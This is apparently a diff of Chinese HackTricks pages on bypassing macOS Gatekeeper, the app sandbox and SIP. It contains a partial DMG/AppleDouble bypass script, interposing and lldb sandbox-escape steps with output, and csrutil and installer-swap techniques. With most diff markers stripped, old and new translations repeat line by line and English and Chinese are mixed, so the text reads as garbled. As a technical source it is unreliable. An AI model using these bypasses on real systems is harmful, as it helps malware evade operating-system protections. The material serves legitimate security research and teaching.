能够创建一个不会设置隔离属性的文件,这样就有可能绕过 Gatekeeper。技巧是使用 AppleDouble 命名约定(以 `._` 开头)创建一个 DMG 文件应用程序,并创建一个可见文件作为对这个没有隔离属性的隐藏文件的符号链接。当执行 dmg 文件时,由于它没有隔离属性,它将绕过 Gatekeeper。
能够创建一个不会设置隔离属性的文件,**可以绕过 Gatekeeper。** 这个技巧是**使用 AppleDouble 命名约定创建一个 DMG 文件应用程序**(以 `._` 开头),并创建一个**作为此隐藏文件的符号链接的可见文件**,而没有隔离属性。\
当**dmg 文件被执行**时,由于它没有隔离属性,它将**绕过 Gatekeeper**。
```bash
# Create an app bundle with the backdoor an call it app.app
@ -420,19 +425,34 @@ ln -s ._app.dmg s/app/app.dmg
echo "[+] compressing files"
aa archive -d s/ -o app.aar
```
### uchg (from this [talk](https://codeblue.jp/2023/result/pdf/cb23-bypassing-macos-security-and-privacy-mechanisms-from-gatekeeper-to-system-integrity-protection-by-koh-nakagawa.pdf))
### uchg (来自这个 [演讲](https://codeblue.jp/2023/result/pdf/cb23-bypassing-macos-security-and-privacy-mechanisms-from-gatekeeper-to-system-integrity-protection-by-koh-nakagawa.pdf))
* 创建一个包含应用程序的目录。
* 为应用程序添加 uchg
* 将 uchg 添加到应用程序中
* 将应用程序压缩为 tar.gz 文件。
* 将 tar.gz 文件发送给受害者。
* 受害者打开 tar.gz 文件并运行应用程序。
* Gatekeeper 不会检查该应用程序。
### 防止隔离 xattr
### 防止 Quarantine xattr
".app" 捆绑包中,如果未添加隔离 xattr则在执行时**Gatekeeper 不会触发**
一个 ".app" 包中,如果没有添加 quarantine xattr当执行时 **Gatekeeper 不会被触发**
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

159
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/README.md
View file

@ -1,94 +1,96 @@
# macOS沙箱调试与绕过
# macOS Sandbox Debug & Bypass
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
## 沙箱加载过程
## Sandbox 加载过程
<figure><img src="../../../../../.gitbook/assets/image (901).png" alt=""><figcaption><p>图片来源:<a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
<figure><img src="../../../../../.gitbook/assets/image (901).png" alt=""><figcaption><p>图片来<a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
上图中,当运行具有授权**`com.apple.security.app-sandbox`**的应用程序时,可以观察到**沙箱将如何加载**。
前面的图像中,可以观察到 **当运行具有权限 **`com.apple.security.app-sandbox`** 的应用程序时,沙盒将如何加载**。
编译器将`/usr/lib/libSystem.B.dylib`链接到二进制文件。
编译器将链接 `/usr/lib/libSystem.B.dylib` 到二进制文件。
然后,**`libSystem.B`**将调用其他几个函数,直到**`xpc_pipe_routine`**将应用程序的授权发送给**`securityd`**。Securityd检查进程是否应该被隔离在沙箱中,如果是,它将被隔离。\
最后,沙箱将通过调用**`__sandbox_ms`**激活,后者将调用**`__mac_syscall`**。
然后,**`libSystem.B`** 将调用其他几个函数,直到 **`xpc_pipe_routine`** 将应用程序的权限发送到 **`securityd`**。Securityd 检查该进程是否应该在沙盒内进行隔离,如果是,它将被隔离。\
最后,沙盒将通过调用 **`__sandbox_ms`** 激活,该调用将调用 **`__mac_syscall`**。
## 可能的绕过方
## 可能的绕过方
### 绕过隔离属性
由**沙箱进程创建的文件**会附加**隔离属性**以防止沙箱逃逸。但是,如果您设法在沙箱应用程序中**创建一个没有隔离属性的`.app`文件夹**,则可以使应用程序捆绑的二进制文件指向**`/bin/bash`**,并在**plist**中添加一些环境变量以滥用**`open`**以**启动新的未经沙箱处理的应用程序**
**由沙盒进程创建的文件** 会附加 **隔离属性** 以防止沙盒逃逸。然而,如果你设法 **在沙盒应用程序内创建一个没有隔离属性的 `.app` 文件夹**,你可以使应用程序包的二进制文件指向 **`/bin/bash`** 并在 **plist** 中添加一些环境变量,以利用 **`open`** 来 **启动新的未沙盒应用程序**
这就是[**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)中所做的事情**。**
这就是[**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)** 中所做的**。
{% hint style="danger" %}
因此,目前,如果您只能创建一个名称以**`.app`**结尾且没有隔离属性的文件夹您可以逃离沙箱因为macOS仅在**`.app`文件夹**和**主可执行文件**中**检查** **隔离**属性(我们将主可执行文件指向**`/bin/bash`**)。
因此,目前,如果你仅能创建一个名称以 **`.app`** 结尾且没有隔离属性的文件夹,你可以逃离沙盒,因为 macOS 只 **检查** **`.app` 文件夹** 和 **主可执行文件** 中的 **隔离** 属性(我们将把主可执行文件指向 **`/bin/bash`**)。
请注意,如果已经授权运行.app捆绑包具有带有授权运行标志的隔离xttr您也可以滥用它... 除非现在您无法在**`.app`**捆绑包中写入除非您具有某些特权TCC权限在高沙箱中您将无法拥有)。
请注意,如果一个 .app 包已经被授权运行(它具有带有授权运行标志的隔离 xttr你也可以利用它……只是现在你不能在 **`.app`** 包内写入,除非你拥有一些特权 TCC 权限(在高沙盒内你将没有这些权限)。
{% endhint %}
### 滥用Open功能
### 利用 Open 功能
[**Word沙箱绕过的最后示例**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv)中,可以看到如何滥用**`open`**命令行功能来绕过沙箱
[**Word 沙盒绕过的最后示例**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv) 中可以看到如何利用 **`open`** CLI 功能来绕过沙盒
{% content-ref url="macos-office-sandbox-bypasses.md" %}
[macos-office-sandbox-bypasses.md](macos-office-sandbox-bypasses.md)
{% endcontent-ref %}
### 启动代理/守护程
### 启动代理/守护
即使应用程序**应该被沙箱化**`com.apple.security.app-sandbox`如果它是从LaunchAgent`~/Library/LaunchAgents`)中执行的,仍然可以绕过沙箱。\
如[**此文章**](https://www.vicarius.io/vsociety/posts/cve-2023-26818-sandbox-macos-tcc-bypass-w-telegram-using-dylib-injection-part-2-3?q=CVE-2023-26818)中所述如果要使一个被沙箱化的应用程序获得持久性可以将其自动执行为LaunchAgent并可能通过DyLib环境变量注入恶意代码。
即使一个应用程序 **旨在被沙盒化** (`com.apple.security.app-sandbox`),如果它 **从 LaunchAgent 执行**(例如 `~/Library/LaunchAgents`),也可以绕过沙盒。\
正如在 [**这篇文章**](https://www.vicarius.io/vsociety/posts/cve-2023-26818-sandbox-macos-tcc-bypass-w-telegram-using-dylib-injection-part-2-3?q=CVE-2023-26818) 中所解释的,如果你想要在一个沙盒应用程序中获得持久性,你可以使其作为 LaunchAgent 自动执行,并可能通过 DyLib 环境变量注入恶意代码。
### 用自动启动位置
### 用自动启动位置
如果沙箱进程可以在**稍后将要运行二进制文件的未经沙箱处理的应用程序的位置写入**,它将能够**通过将二进制文件放置在那里来逃逸**。这种位置的一个很好的例子是`~/Library/LaunchAgents`或`/System/Library/LaunchDaemons`
如果一个沙盒进程可以 **在一个地方写入****稍后一个未沙盒的应用程序将运行该二进制文件**,它将能够 **通过将二进制文件放置在那里** 来逃离沙盒。这类位置的一个好例子是 `~/Library/LaunchAgents``/System/Library/LaunchDaemons`
为此,您甚至可能需要**2个步骤**:使具有**更宽松沙箱**`file-read*``file-write*`)的进程执行您的代码,实际上会写入一个将在**未经沙箱处理的地方执行**的位置
为此,你可能需要 **两个步骤**:使一个具有 **更宽松沙盒** (`file-read*`, `file-write*`) 的进程执行你的代码,该代码实际上将在一个将 **未沙盒执行** 的地方写入
查看关**自动启动位置**的页面:
查看关**自动启动位置** 的页面:
{% content-ref url="../../../../macos-auto-start-locations.md" %}
[macos-auto-start-locations.md](../../../../macos-auto-start-locations.md)
{% endcontent-ref %}
### 用其他进程
### 用其他进程
如果从沙箱进程中能够**危害运行在较不严格沙箱(或无沙箱)中的其他进程**,则可以逃逸到它们的沙箱中
如果从沙盒进程中你能够 **妥协其他在较少限制沙盒(或没有沙盒)中运行的进程**,你将能够逃离它们的沙盒
{% content-ref url="../../../macos-proces-abuse/" %}
[macos-proces-abuse](../../../macos-proces-abuse/)
{% endcontent-ref %}
### 静态编译动态链接
### 静态编译动态链接
[**这项研究**](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/)发现了绕过沙箱的2种方法。因为沙箱是从用户空间应用时加载**libSystem**库的。如果一个二进制文件可以避免加载它,它将永远不会被沙箱化:
[**这项研究**](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/) 发现了两种绕过沙盒的方法。因为沙盒是在用户空间中应用的,当 **libSystem** 库被加载时。如果一个二进制文件能够避免加载它,它将永远不会被沙盒化:
* 如果二进制文件是**完全静态编译**的,它可以避免加载该库。
* 如果**二进制文件不需要加载任何库**因为链接器也在libSystem中它将不需要加载libSystem。
* 如果二进制文件是 **完全静态编译** 的,它可以避免加载该库。
* 如果 **二进制文件不需要加载任何库**(因为链接器也在 libSystem 中),它将不需要加载 libSystem。
### Shellcodes
请注意即使ARM64中的**shellcodes**也需要链接到`libSystem.dylib`
请注意 **即使是 shellcodes** 在 ARM64 中也需要链接到 `libSystem.dylib`
```bash
ld -o shell shell.o -macosx_version_min 13.0
ld: dynamic executables or dylibs must link with libSystem.dylib for architecture arm64
```
### 权限
### Entitlements
请注意,即使某些**操作**可能在沙盒中被**允许**,如果应用程序具有特定的**权限**,就像这样
注意,即使某些 **操作** 可能在沙箱中被 **允许**,如果应用程序具有特定的 **权限**,例如
```scheme
(when (entitlement "com.apple.security.network.client")
(allow network-outbound (remote ip))
@ -100,7 +102,7 @@ ld: dynamic executables or dylibs must link with libSystem.dylib for architectur
```
### Interposting Bypass
有关**Interposting**的更多信息,请查看:
有关 **Interposting** 的更多信息,请查看:
{% content-ref url="../../../macos-proces-abuse/macos-function-hooking.md" %}
[macos-function-hooking.md](../../../macos-proces-abuse/macos-function-hooking.md)
@ -130,7 +132,7 @@ DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand
_libsecinit_initializer called
Sandbox Bypassed!
```
#### 拦截 `__mac_syscall` 以防止沙盒
#### Interpost `__mac_syscall` to prevent the Sandbox
{% code title="interpose.c" %}
```c
@ -176,9 +178,9 @@ __mac_syscall invoked. Policy: Quarantine, Call: 87
__mac_syscall invoked. Policy: Sandbox, Call: 4
Sandbox Bypassed!
```
### 使用 lldb 调试和绕过沙
### 使用 lldb 调试和绕过沙
让我们编译一个应该被沙化的应用程序:
让我们编译一个应该被沙化的应用程序:
{% tabs %}
{% tab title="sand.c" %}
@ -190,7 +192,7 @@ system("cat ~/Desktop/del.txt");
```
{% endtab %}
{% tab title="entitlements.xml" %}在macOS中沙盒是一种重要的安全机制用于限制应用程序的访问权限以减少潜在的攻击面。然而有时候我们需要绕过沙盒以执行某些操作。在调试和绕过macOS沙盒时我们可以利用entitlements.xml文件来修改应用程序的权限配置从而绕过沙盒的限制。{% endtab %}
{% tab title="entitlements.xml" %}
```xml
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
<dict>
@ -201,46 +203,7 @@ system("cat ~/Desktop/del.txt");
```
{% endtab %}
{% tab title="Info.plist" %}
## macOS Sandbox Debug and Bypass
### Introduction
This document outlines various techniques to debug and bypass the macOS sandbox for security researchers and penetration testers.
### Table of Contents
- [Introduction](#introduction)
- [Sandbox Debugging Techniques](#sandbox-debugging-techniques)
- [Bypassing macOS Sandbox Restrictions](#bypassing-macos-sandbox-restrictions)
- [Conclusion](#conclusion)
### Sandbox Debugging Techniques
#### 1. Using LLDB to Debug Sandboxed Applications
LLDB can be used to attach to a sandboxed application and debug it. This can help in understanding how the application interacts with the sandbox and identifying potential weaknesses.
#### 2. Analyzing Sandbox Profiles
Analyzing the sandbox profiles can provide insights into the restrictions imposed on an application. By understanding these restrictions, security researchers can identify ways to bypass them.
### Bypassing macOS Sandbox Restrictions
#### 1. Exploiting Vulnerabilities
Identifying and exploiting vulnerabilities in macOS can lead to privilege escalation and bypassing sandbox restrictions. Security researchers should focus on finding and exploiting such vulnerabilities.
#### 2. Abusing Entitlements
Abusing entitlements granted to applications can also help in bypassing sandbox restrictions. By manipulating entitlements, attackers can gain additional privileges within the sandboxed environment.
### Conclusion
Understanding how the macOS sandbox works and the techniques to debug and bypass it is crucial for security researchers and penetration testers. By identifying weaknesses in the sandbox implementation, researchers can help improve the overall security of macOS systems.
{% endtab %}
{% tab title="Info.plist" %}
```xml
<plist version="1.0">
<dict>
@ -254,7 +217,7 @@ Understanding how the macOS sandbox works and the techniques to debug and bypass
{% endtab %}
{% endtabs %}
然后编译应用程序:
然后编译应用程序:
{% code overflow="wrap" %}
```bash
@ -269,14 +232,14 @@ codesign -s <cert-name> --entitlements entitlements.xml sand
{% endcode %}
{% hint style="danger" %}
该应用程序将尝试**读取**文件**`~/Desktop/del.txt`**,而**沙盒不允许**这样做。\
那里创建一个文件,一旦绕过沙盒,它就能够读取它:
该应用程序将尝试**读取**文件**`~/Desktop/del.txt`**,而**沙箱将不允许**。\
这里创建一个文件,因为一旦绕过沙箱,它将能够读取它:
```bash
echo "Sandbox Bypassed" > ~/Desktop/del.txt
```
{% endhint %}
让我们调试应用程序,查看沙盒何时加载:
让我们调试应用程序,查看沙盒何时加载:
```bash
# Load app in debugging
lldb ./sand
@ -354,25 +317,27 @@ Sandbox Bypassed!
Process 2517 exited with status = 0 (0x00000000)
```
{% hint style="warning" %}
**即使绕过了沙TCC** 也会询问用户是否允许该进程读取桌面上的文件
**即使绕过了沙TCC** 仍会询问用户是否允许该进程读取桌面上的文件
{% endhint %}
## 参考资料
## 参考文献
* [http://newosxbook.com/files/HITSB.pdf](http://newosxbook.com/files/HITSB.pdf)
* [https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/)
* [https://www.youtube.com/watch?v=mG715HcDgO8](https://www.youtube.com/watch?v=mG715HcDgO8)
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式:
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFT](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

172
macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.md
View file

@ -1,26 +1,27 @@
# macOS SIP
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -30,190 +31,189 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
## **基本信息**
macOS中的**系统完整性保护SIP**是一种机制,旨在防止即使是最特权的用户也无法对关键系统文件进行未经授权的更改。此功能通过限制在受保护区域添加、修改或删除文件等操作,发挥着维护系统完整性的关键作用。SIP保护的主要文件夹包括
macOS 中的 **系统完整性保护 (SIP)** 是一种机制,旨在防止即使是最特权的用户也对关键系统文件进行未经授权的更改。此功能在维护系统完整性方面发挥着至关重要的作用,通过限制在受保护区域添加、修改或删除文件等操作。SIP 保护的主要文件夹包括:
* **/System**
* **/bin**
* **/sbin**
* **/usr**
SIP行为的规则在位于**`/System/Library/Sandbox/rootless.conf`**的配置文件中定义。在此文件中,以星号(\*)为前缀的路径被标记为SIP限制的例外情况
管理 SIP 行为的规则定义在位于 **`/System/Library/Sandbox/rootless.conf`** 的配置文件中。在此文件中,以星号(\*)为前缀的路径被视为对其他严格 SIP 限制的例外
请参考以下示例:
以下示例:
```javascript
/usr
* /usr/libexec/cups
* /usr/local
* /usr/share/man
```
段代码暗示了虽然SIP通常保护**`/usr`**目录,但在特定子目录(`/usr/libexec/cups`、`/usr/local`和`/usr/share/man`)中,修改是允许的,这可以通过路径前面的星号(\*)来表示。
个片段暗示,虽然 SIP 通常保护 **`/usr`** 目录,但有特定的子目录(`/usr/libexec/cups`、`/usr/local` 和 `/usr/share/man`)可以进行修改,如路径前的星号(\*)所示。
要验证目录或文件是否受SIP保护可以使用**`ls -lOd`**命令检查**`restricted`**或**`sunlnk`**标志的存在。例如:
要验证某个目录或文件是否受SIP 保护,可以使用 **`ls -lOd`** 命令检查是否存在 **`restricted`** **`sunlnk`** 标志。例如:
```bash
ls -lOd /usr/libexec/cups
drwxr-xr-x 11 root wheel sunlnk 352 May 13 00:29 /usr/libexec/cups
```
在这种情况下,**`sunlnk`** 标志表示 `/usr/libexec/cups` 目录本身**无法被删除**,尽管其中的文件可以创建、修改或删除。
在这种情况下,**`sunlnk`** 标志表示 `/usr/libexec/cups` 目录本身 **无法被删除**,尽管可以创建、修改或删除其中的文件
另一方面:
```bash
ls -lOd /usr/libexec
drwxr-xr-x 338 root wheel restricted 10816 May 13 00:29 /usr/libexec
```
这里,**`restricted`** 标志表示 `/usr/libexec` 目录受 SIP 保护。在受 SIP 保护的目录中,文件无法被创建、修改或删除。
这里,**`restricted`** 标志表示 `/usr/libexec` 目录受到 SIP 保护。在 SIP 保护的目录中,文件不能被创建、修改或删除。
此外,如果文件包含属性 **`com.apple.rootless`** 扩展 **属性**那个文件也将受到 **SIP 保护**。
此外,如果一个文件包含 **`com.apple.rootless`** 扩展 **属性**该文件也将 **受到 SIP 保护**。
**SIP 还限制其他 root 操作**如:
**SIP 还限制其他根操作**,例如:
* 加载不受信任的内核扩展
* 为苹果签名的进程获取任务端口
* 获取 Apple 签名进程的任务端口
* 修改 NVRAM 变量
* 允许内核调试
选项以位标志形式保存在 nvram 变量中(在 Intel 上为 `csr-active-config`,在 ARM 上从引导的设备树中读取 `lp-sip0`)。您可以在 XNU 源代码中的 `csr.sh` 中找到这些标志:
选项以位标志形式保存在 nvram 变量中(在 Intel 上为 `csr-active-config`,在 ARM 上从启动的设备树中读取 `lp-sip0`)。您可以在 `csr.sh` 的 XNU 源代码中找到这些标志:
<figure><img src="../../../.gitbook/assets/image (1192).png" alt=""><figcaption></figcaption></figure>
### SIP 状态
您可以使用以下命令检查系统是否启用了 SIP
您可以使用以下命令检查系统是否启用了 SIP
```bash
csrutil status
```
如果您需要禁用SIP您必须在恢复模式下重新启动计算机在启动过程中按下Command+R然后执行以下命令
如果您需要禁用 SIP您必须在恢复模式下重新启动计算机在启动时按 Command+R然后执行以下命令
```bash
csrutil disable
```
如果您希望保持 SIP 启用但移除调试保护,可以通过以下方式实现
如果您希望保持 SIP 启用但移除调试保护,可以使用
```bash
csrutil enable --without debug
```
### 其他限制
* **禁止加载未签名的内核扩展**kext确保只有经过验证的扩展与系统内核交互。
* **禁止加载未签名的内核扩展**kexts),确保只有经过验证的扩展与系统内核交互。
* **防止调试** macOS 系统进程,保护核心系统组件免受未经授权的访问和修改。
* **阻止工具** 如 dtrace 检查系统进程,进一步保护系统操作的完整性。
* **抑制工具** 如 dtrace 检查系统进程,进一步保护系统操作的完整性。
[**在这个讲座中了解更多有关 SIP 信息**](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship)****
[**在此演讲中了解有关 SIP 的更多信息**](https://www.slideshare.net/i0n1c/syscan360-stefan-esser-os-x-el-capitan-sinking-the-ship)**.**
## SIP 绕过
绕过 SIP 使攻击者能够:
* **访问用户数据**从所有用户帐户中读取敏感用户数据,如邮件、消息和 Safari 历史记录。
* **TCC 绕过**:直接操作 TCC透明度、同意和控制数据库以授予对摄像头、麦克风和其他资源的未经授权访问。
* **建立持久性**将恶意软件放置在受 SIP 保护的位置,使其难以被移除,即使是通过 root 权限。这还包括篡改恶意软件移除工具MRT的潜力。
* **加载内核扩展**:尽管有额外的保护措施,绕过 SIP 简化了加载未签名内核扩展的过程。
* **访问用户数据**读取所有用户帐户的敏感用户数据,如邮件、消息和 Safari 历史记录。
* **TCC 绕过**:直接操纵 TCC透明性、同意和控制数据库以授予对网络摄像头、麦克风和其他资源的未经授权访问。
* **建立持久性**在 SIP 保护的位置放置恶意软件,使其即使在根权限下也能抵抗删除。这还包括篡改恶意软件删除工具MRT的潜力。
* **加载内核扩展**:尽管有额外的保护,绕过 SIP 简化了加载未签名内核扩展的过程。
### 安装程序
### 安装包
**使用 Apple 证书签名的安装程序包** 可以绕过其保护措施。这意味着即使是由标准开发人员签名的程序包,如果它们试图修改受 SIP 保护的目录,也将被阻止。
**使用 Apple 证书签名的安装包** 可以绕过其保护。这意味着即使是标准开发者签名的包,如果尝试修改 SIP 保护的目录,也会被阻止。
### 不存在的 SIP 文件
一个潜在的漏洞是,如果一个文件在 **`rootless.conf` 中被指定但当前不存在**,它可以被创建。恶意软件可以利用这一点在系统上 **建立持久性**。例如,如果在 `rootless.conf` 中列出但不存在,那么恶意程序可以在 `/System/Library/LaunchDaemons` 中创建一个 .plist 文件。
一个潜在的漏洞是,如果**`rootless.conf` 中指定了一个文件但当前不存在**,则可以创建它。恶意软件可以利用这一点来 **建立持久性** 在系统上。例如,如果恶意程序在 `rootless.conf` 中列出但不存在,它可以在 `/System/Library/LaunchDaemons` 中创建一个 .plist 文件。
### com.apple.rootless.install.heritable
{% hint style="danger" %}
**`com.apple.rootless.install.heritable`** 允许绕过 SIP
**`com.apple.rootless.install.heritable`** 允许绕过 SIP
{% endhint %}
#### [CVE-2019-8561](https://objective-see.org/blog/blog\_0x42.html) <a href="#cve" id="cve"></a>
发现可以在系统验证其代码签名后 **交换安装程序包**,然后系统将安装恶意程序包而不是原始程序包。由于这些操作是由 **`system_installd`** 执行的,因此可以绕过 SIP。
发现可以在 **系统验证其代码** 签名后 **交换安装包**,然后系统将安装恶意包而不是原始包。由于这些操作是由 **`system_installd`** 执行的,因此可以绕过 SIP。
#### [CVE-20209854](https://objective-see.org/blog/blog\_0x4D.html) <a href="#cve-unauthd-chain" id="cve-unauthd-chain"></a>
如果从挂载的映像或外部驱动器安装了程序包,则 **安装程序** 将从 **该文件系统**(而不是 SIP 受保护的位置)执行二进制文件,使 **`system_installd`** 执行任意二进制文件。
如果从挂载的映像或外部驱动器安装包,**安装程序** 将 **执行** 来自 **该文件系统** 的二进制文件(而不是来自 SIP 保护的位置),使 **`system_installd`** 执行任意二进制文件。
#### CVE-2021-30892 - Shrootless
